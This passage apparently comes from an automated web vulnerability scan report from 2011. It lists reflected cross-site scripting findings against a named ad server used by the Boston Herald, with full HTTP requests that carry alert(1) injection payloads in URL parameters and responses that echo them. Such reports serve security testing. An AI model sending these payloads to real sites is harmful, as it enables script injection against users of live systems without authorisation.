Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.56. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba16c'-alert(1)-'c2fbc8b1d49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosheraldba16c'-alert(1)-'c2fbc8b1d49/be_ent;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.57. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 148cd'-alert(1)-'f73be52e6c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent148cd'-alert(1)-'f73be52e6c0;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.58. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f21c'-alert(1)-'d04176c671d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?;&5f21c'-alert(1)-'d04176c671d=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7631
Date: Sat, 29 Jan 2011 05:19:40 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=300x250;net=q1;&5f21c'-alert(1)-'d04176c671d=1;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_h;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;bt
...[SNIP]...

4.59. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9623d'-alert(1)-'9f272341de0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent;sz=9623d'-alert(1)-'9f272341de0 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:36 GMT
Connection: close
Content-Length: 7619

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6076,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=9623d'-alert(1)-'9f272341de0;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.60. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549b1'-alert(1)-'fc8e7858573 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj549b1'-alert(1)-'fc8e7858573/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.61. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eea20'-alert(1)-'a4b741dc452 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosheraldeea20'-alert(1)-'a4b741dc452/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.62. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feec8'-alert(1)-'139d285e531 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent_frfeec8'-alert(1)-'139d285e531;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:42 GMT
Connection: close
Content-Length: 7648

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-50028198_1296266082","http://ad.doubleclick.net/adj/q1.bosherald/be_ent_frfeec8'-alert(1)-'139d285e531;net=q1;u=,q1-50028198_1296266082,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport
...[SNIP]...

4.63. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6329'-alert(1)-'26662898743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;&f6329'-alert(1)-'26662898743=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7634
Date: Sat, 29 Jan 2011 05:19:39 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=300x250;net=q1;&f6329'-alert(1)-'26662898743=1;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_h;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;bt
...[SNIP]...

4.64. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11b4'-alert(1)-'a0b31f3de82 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent_fr;sz=b11b4'-alert(1)-'a0b31f3de82 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Content-Length: 7622

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6073,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=b11b4'-alert(1)-'a0b31f3de82;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.65. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a1e8'-alert(1)-'36cbf08e36e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj4a1e8'-alert(1)-'36cbf08e36e/q1.bosherald/ent;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.66. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4d68'-alert(1)-'439fb269440 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosheraldb4d68'-alert(1)-'439fb269440/ent;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.67. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b712c'-alert(1)-'5c1810d0077 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/entb712c'-alert(1)-'5c1810d0077;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.68. http://a.collective-media.net/cmadj/q1.bosherald/ent [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a882'-alert(1)-'a42b4e4a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/ent?2a882'-alert(1)-'a42b4e4a6b3=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

4.69. http://a.collective-media.net/cmadj/q1.bosherald/ent [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb091'-alert(1)-'152f5176ca5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/ent;sz=fb091'-alert(1)-'152f5176ca5 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:35 GMT
Connection: close
Content-Length: 7614

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6075,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=fb091'-alert(1)-'152f5176ca5;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.70. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1fa1'-alert(1)-'99ecf593489 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjb1fa1'-alert(1)-'99ecf593489/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
